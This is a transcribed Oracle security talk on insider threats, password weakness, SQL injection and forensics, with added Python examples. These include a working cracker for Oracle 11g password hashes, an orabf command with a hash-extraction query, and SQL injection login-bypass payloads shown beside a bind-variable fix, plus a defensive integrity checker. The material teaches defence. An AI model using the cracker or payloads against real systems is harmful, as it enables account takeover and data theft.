![Page 1: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/1.jpg)
Seducing the pants off Oracle
Gary Myers
The pictures are courtesy of http://picasaweb.google.com/silverghost1951
![Page 2: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/2.jpg)
Computers don't "get" threats
![Page 3: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/3.jpg)
AUTHENTICATION vs AUTHORISATION
• Passwords = AUTHENTICATION mechanism (who am I)
• With the DBA's username and password, I can convince the database I am the DBA
• DBA is typically authorised to do all (or most) things.
![Page 4: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/4.jpg)
I AM YOUR WORST NIGHTMARE
or at least in your Top Ten
![Page 5: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/5.jpg)
I Am Your Worst Nightmare
• External consultant (or contractor)
• Good understanding of Oracle
• Follows a lot of the (public) Oracle security chatter
![Page 6: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/6.jpg)
I Am Your Worst Nightmare
• Only around for a short period
• Next week, I may be working for your competitor
• Next week, I may be unemployed
– Motive is often malice or financial gain
– Don't rule out sheer incompetence
– Financial need often driven by…
• Addiction to drugs or alcohol
• Gambling debts or expensive women
• Sydney house prices
![Page 7: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/7.jpg)
I Am Your Worst Nightmare
• I have access to your offices
• I have access to your computers
• I have access to your databases
![Page 8: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/8.jpg)
I Am Your Worst Nightmare
Means
• I am a consultant (or contractor)
• I have a good understanding of Oracle
• I follow a lot of the (public) Oracle security talk
Motive
• I may only be around for weeks
• I may be working for your competitor next
• I may be unemployed next
Opportunity
• I have access to your offices
• I have access to your computers
• I probably have access to your databases
![Page 9: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/9.jpg)
RISK ASSESSMENT
Fall or be shot?
![Page 10: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/10.jpg)
It's All About Risks
• Denial of Service
• Unauthorised reads
• Unauthorised writes
• Unauthorised use
• Gateway to the Great Beyond
• Falling from buildings or being shot - not so much
![Page 11: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/11.jpg)
DENIAL OF SERVICE
Your ride ends now...
![Page 12: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/12.jpg)
Denial of Service
• Crash the database (or listener)
• Catastrophic data loss
• Catastrophic data corruption
• Standard DR recovery
• Beware: the attack may be repeated
![Page 13: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/13.jpg)
UNAUTHORISED READS
No peeking
![Page 14: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/14.jpg)
Unauthorised Reads
Someone sees something they shouldn't
– Backups
– Redo / Undo files
– Trace files, dumps and exports
– Data in transit (client to/from server)
– Operating System (memory)
– Development and test databases
![Page 15: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/15.jpg)
Unauthorised Reads
• Internal info (eg DBA_USERS)
• Inference
– Clues about data
![Page 16: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/16.jpg)
Unauthorised Reads
• Don't store data you don't need
• Don't store a value where a hash will do (eg passwords)
• Encrypt personal information
• Encrypt financial information
• Limit 'back door' access (TDE)
• Individual authentication
• Regularly review authorisations
• Audit
![Page 17: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/17.jpg)
Unauthorised Reads
Around a quarter of staff would steal information such as customer lists when they moved employment (The Register, 19th August 2010)
![Page 18: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/18.jpg)
UNAUTHORISED WRITES
Destroying the evidence
![Page 19: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/19.jpg)
Unauthorised Writes
• Insert, update or deletion of data
– Could be 'regular' data
– Could be 'tidying away' evidence (audit trail)
– Could be data dictionary (rootkit)
• Audit (to OS, not DB)
• Checksum packages, files…
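The "checksum packages, files" defence from the slide, as an added example in Python (not code from the talk). It takes a baseline of SHA-256 digests while the system is known good, recomputes it later and reports what was modified, added or removed. The same compare works for files on the database server and for PL/SQL source text (the TEXT lines of DBA_SOURCE joined per object), which is how you would spot a tampered supplied package. The file names, their contents and the DBMS_FOO package source are constructed for the demo.

```python
"""Baseline-and-compare integrity check for files and PL/SQL package source.

Added example, not from the slides.  Sample files and the DBMS_FOO source
below are constructed for the demo; DBMS_FOO is a hypothetical package name.
"""
import hashlib
import json
import os
import tempfile


def digest_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def digest_file(path: str) -> str:
    """SHA-256 of a file, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline_files(paths) -> dict:
    """Map each path to its digest: the stored, known-good baseline."""
    return {p: digest_file(p) for p in paths}


def baseline_sources(sources: dict) -> dict:
    """Map object name -> digest of its source text.

    `sources` is {name: [line, line, ...]} as fetched from DBA_SOURCE ordered by
    LINE.  Lines are joined verbatim, so even a whitespace-only change shows up,
    which is what you want when hunting a tampered package."""
    return {name: digest_bytes("".join(lines).encode("utf-8"))
            for name, lines in sources.items()}


def compare(old: dict, new: dict) -> dict:
    """Return {'modified': [...], 'added': [...], 'removed': [...]}, each sorted."""
    return {
        "modified": sorted(k for k in old if k in new and old[k] != new[k]),
        "added": sorted(k for k in new if k not in old),
        "removed": sorted(k for k in old if k not in new),
    }


def save_baseline(b: dict, path: str) -> None:
    # Keep the baseline off the DB server: an attacker who can rewrite a package
    # or binary can just as easily rewrite a baseline stored next to it.
    with open(path, "w") as f:
        json.dump(b, f, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path) as f:
        return json.load(f)


def demo() -> dict:
    """Constructed run: baseline two files, tamper with one, plant a third."""
    with tempfile.TemporaryDirectory() as d:
        a = os.path.join(d, "listener.ora")
        b = os.path.join(d, "sqlnet.ora")
        for p, text in ((a, "LISTENER=(ADDRESS=(PROTOCOL=TCP)(PORT=1521))\n"),
                        (b, "SQLNET.AUTHENTICATION_SERVICES=(NTS)\n")):
            with open(p, "w") as f:
                f.write(text)
        base = baseline_files([a, b])
        save_baseline(base, os.path.join(d, "baseline.json"))
        with open(a, "a") as f:            # tamper: an extra line appended
            f.write("EXTPROC=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC1))\n")
        c = os.path.join(d, "glogin.sql")  # a new file appears
        with open(c, "w") as f:
            f.write("-- planted login script\n")
        result = compare(load_baseline(os.path.join(d, "baseline.json")),
                         baseline_files([a, b, c]))
        return {k: [os.path.basename(p) for p in v] for k, v in result.items()}


if __name__ == "__main__":
    print(demo())
    before = {"DBMS_FOO": ["PACKAGE BODY dbms_foo AS\n",
                           "  PROCEDURE run IS BEGIN NULL; END;\n", "END;\n"]}
    after = {"DBMS_FOO": ["PACKAGE BODY dbms_foo AS\n",
                          "  PROCEDURE run IS BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO GARY'; END;\n",
                          "END;\n"]}
    print(compare(baseline_sources(before), baseline_sources(after)))
```

Run it on a schedule from a host the DBA account cannot write to, and diff against a baseline taken right after each CPU is applied, otherwise the patch itself shows up as "modified".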
![Page 20: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/20.jpg)
UNAUTHORISED USE
No personal calls!
![Page 21: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/21.jpg)
Unauthorised Use
Using the database without permission
– Illegal / illicit
• PCI
– In excess of licensed functionality
• Contractors / Consultants
– Storing private data on the disks
• Cloud
![Page 22: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/22.jpg)
ESCAPING THE DATABASE
Out of the frying pan
![Page 23: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/23.jpg)
Escaping The Database
• Use dev / test to get to Prod
• Use DR to get to Prod
• Use database to get to OS
• Use DB server to get to other local machines
• Use DB server to get to remote machines (HTTP etc)
• Use db password for other apps
![Page 24: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/24.jpg)
PASSWORDS
![Page 25: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/25.jpg)
Password security
• Hashes = passwords
• Crack a million passwords / second
• Seven character passwords - Trivial
• Eight alphabetic character passwords - Trivial
• Eight character passwords plus a '1' on the end - Trivial
• Password fuzzers and Rainbow tables
![Page 26: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/26.jpg)
Password Demo
• Create fresh user in SQL Plus
• Set a reasonable password
– Not TIGER or MANAGER
– Something that you'd remember though
• See whether ORABF will crack it
  select 'orabf '||password||':'||username
  from dba_users where username='GARY';
  cd C:\Documents and Settings\All Users\Documents\Common\orabf-v0.7.6
  orabf 9F868BD4F05CEE80:GARY -c pass_uniq.txt
• (DBA_USERS.PASSWORD carries the 16-hex-digit DES-based hash only up to 10g; on 11g and later the hashes live in SYS.USER$, including the salted SHA-1 'S:' form in SPARE4, and the same dictionary attack still applies.)
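The same attack the orabf demo runs, as an added example in Python (not code from the talk or from orabf). Because the standard library has no DES, it targets the 11g 'S:' format rather than the 10g hash in the slide: Oracle 11g stores 'S:' followed by 40 hex characters of SHA-1(password || salt) and 20 hex characters of the 10-byte salt in SYS.USER$.SPARE4. The block builds such a hash, recovers the password by a word list with the cheap mangling rules the previous slide lists (case variants, a trailing '1'), brute-forces tiny keyspaces, and puts numbers on "a million passwords a second". The user, password, salt and word list are constructed for the demo.

```python
"""Dictionary / brute-force attack on Oracle 11g 'S:' password hashes.

Added example, not from the slides.  Password, salt and word list below are
constructed; the 'S:' layout (SHA-1 over password bytes then 10 salt bytes,
hex-encoded, salt appended) is the 11g SYS.USER$.SPARE4 format.
"""
import hashlib
import itertools
import os


def oracle11g_hash(password: str, salt: bytes) -> str:
    """Build an 'S:' value as 11g stores it (uppercase hex)."""
    assert len(salt) == 10, "Oracle 11g uses a 10-byte salt"
    digest = hashlib.sha1(password.encode("utf-8") + salt).hexdigest()
    return "S:" + (digest + salt.hex()).upper()


def parse_spare4(spare4: str):
    """Return (hash bytes, salt bytes) from an 'S:<40 hex><20 hex>' value."""
    body = spare4.split("S:", 1)[1]
    return bytes.fromhex(body[:40]), bytes.fromhex(body[40:60])


def candidates(word: str):
    """The mangling rules the slides call trivial: case variants and a trailing '1'."""
    for base in (word, word.lower(), word.upper(), word.capitalize()):
        yield base
        yield base + "1"


def crack_dictionary(spare4: str, wordlist):
    """Return the password if any mangled word-list entry matches, else None."""
    target, salt = parse_spare4(spare4)
    for word in wordlist:
        for cand in candidates(word):
            if hashlib.sha1(cand.encode("utf-8") + salt).digest() == target:
                return cand
    return None


def crack_bruteforce(spare4: str, alphabet: str, max_len: int):
    """Exhaust every string over `alphabet` up to `max_len`; only sane for tiny keyspaces."""
    target, salt = parse_spare4(spare4)
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            cand = "".join(tup)
            if hashlib.sha1(cand.encode("utf-8") + salt).digest() == target:
                return cand
    return None


def keyspace_hours(alphabet_size: int, length: int, rate: float = 1_000_000.0) -> float:
    """Hours to exhaust all passwords of exactly `length` characters at `rate`
    guesses per second (the slides' figure is a million per second)."""
    return alphabet_size ** length / rate / 3600.0


if __name__ == "__main__":
    salt = os.urandom(10)
    stored = oracle11g_hash("Tiger1", salt)   # a 'reasonable' password, constructed
    print(stored)
    print(crack_dictionary(stored, ["scott", "manager", "tiger"]))
    for size, length in ((26, 7), (26, 8), (62, 8), (95, 12)):
        print(f"{size}^{length}: {keyspace_hours(size, length):,.1f} h at 1M guesses/s")
```

The salt stops rainbow tables working across accounts, but it does nothing against a word list: one SHA-1 per guess is as fast as the slide says, so the only real defences are long passwords, a profile with FAILED_LOGIN_ATTEMPTS, and keeping SYS.USER$ (and its copies in backups and exports) out of reach.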
![Page 27: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/27.jpg)
I AM YOUR WORST NIGHTMARE
…and I cheat
![Page 28: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/28.jpg)
WRAPPING
The truth is in here
![Page 29: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/29.jpg)
Wrapped Packages
• (Python) code for unwrapping 10g+ PL/SQL is on the web
• Oracle CPU release: changed packages WILL be unwrapped and compared to the 'old' version
• Shows vulnerabilities in old code
• CPUs make vulnerabilities public!
![Page 30: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/30.jpg)
INJECTION EXPLOITS
![Page 31: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/31.jpg)
Exploits
• No benefit in discussing specifics
• Don't know any current 0-day ones
• Others fixed by CPUs
• What would you do with the information anyway?
• Hedgehog Sentrigo?
![Page 32: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/32.jpg)
SQL Injection
• SQL injection is one of the major categories of computer vulnerability
• Typically poorly designed web applications
• Publicly available tools that try to penetrate web-sites by crafting URLs
![Page 33: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/33.jpg)
SQL (and PL/SQL) Injection
• Typically AUTHORISATION attacks
• Convince the database that you are authorised to perform the action
• Bypass any rules saying NO !
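The authorisation bypass these two slides describe, as an added example (not code from the talk). Python's built-in sqlite3 stands in for Oracle so it runs offline; the defect and the fix are the same in PL/SQL, where the vulnerable form is user input concatenated into EXECUTE IMMEDIATE or DBMS_SQL text and the fix is bind variables (:name in Oracle rather than the ? placeholders here). The table, accounts and hashes are constructed for the demo.

```python
"""SQL injection as an authorisation bypass: vulnerable login beside the fix.

Added example, not from the slides.  sqlite3 stands in for Oracle; the
app_users table and its rows are constructed.
"""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE app_users (username TEXT PRIMARY KEY, pw_hash TEXT, role TEXT)")
    rows = [("admin", hashlib.sha256(b"correct horse").hexdigest(), "DBA"),
            ("gary", hashlib.sha256(b"Tiger1").hexdigest(), "READONLY")]
    conn.executemany("INSERT INTO app_users VALUES (?, ?, ?)", rows)
    conn.commit()
    return conn


def vulnerable_login(conn, username: str, password: str):
    """The 'poorly designed web application': user input pasted into the SQL text.
    Returns the role the database now believes the caller is authorised for."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    sql = ("SELECT role FROM app_users WHERE username = '%s' AND pw_hash = '%s'"
           % (username, pw_hash))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username: str, password: str):
    """Same query with bind variables: the input can only ever be a value."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT role FROM app_users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash)).fetchone()
    return row[0] if row else None


# Two classic payloads.  The first comments the password check out of the
# statement; the second rewrites the WHERE clause so the DBA row always matches.
PAYLOAD_COMMENT = "admin' --"
PAYLOAD_OR = "x' OR role = 'DBA' --"


def demo() -> dict:
    conn = make_db()
    return {
        "legit": safe_login(conn, "admin", "correct horse"),
        "vuln_comment": vulnerable_login(conn, PAYLOAD_COMMENT, "wrong"),
        "vuln_or": vulnerable_login(conn, PAYLOAD_OR, "wrong"),
        "safe_comment": safe_login(conn, PAYLOAD_COMMENT, "wrong"),
        "safe_or": safe_login(conn, PAYLOAD_OR, "wrong"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:>13}: {v}")
```

Note that no password was cracked and no account was unlocked: the database authenticated nobody, it was simply asked a question whose answer says "DBA". That is why the slide files injection under authorisation rather than authentication, and why the fix belongs in the statement, not in a password policy.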
![Page 34: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/34.jpg)
Standard Packages
• Vulnerabilities in supplied packages often allow for privilege escalation
• Accounts like MDSYS have CREATE ANY TRIGGER privilege
• Can be abused even if the account is locked
![Page 35: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/35.jpg)
Corkscrew Thinking
Multiple steps to get around multiple barriers
![Page 36: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/36.jpg)
AUDIT AND FORENSICS
Caught in the act… or afterwards
![Page 37: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/37.jpg)
Forensics
• Database log file
• Web / application server log files
• Audit to an Operating System file
• FTP the file(s) somewhere safe
• Log Miner
• DDL triggers
• Block dumps, AWR, ORA_ROWSCN…
![Page 38: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/38.jpg)
Useful References
• Pete Finnigan – www.petefinnigan.com
• Alexander Kornbrust – blog.red-database-security.com
• David Litchfield – Hacker's Handbooks (The Database Hacker's Handbook / The Oracle Hacker's Handbook)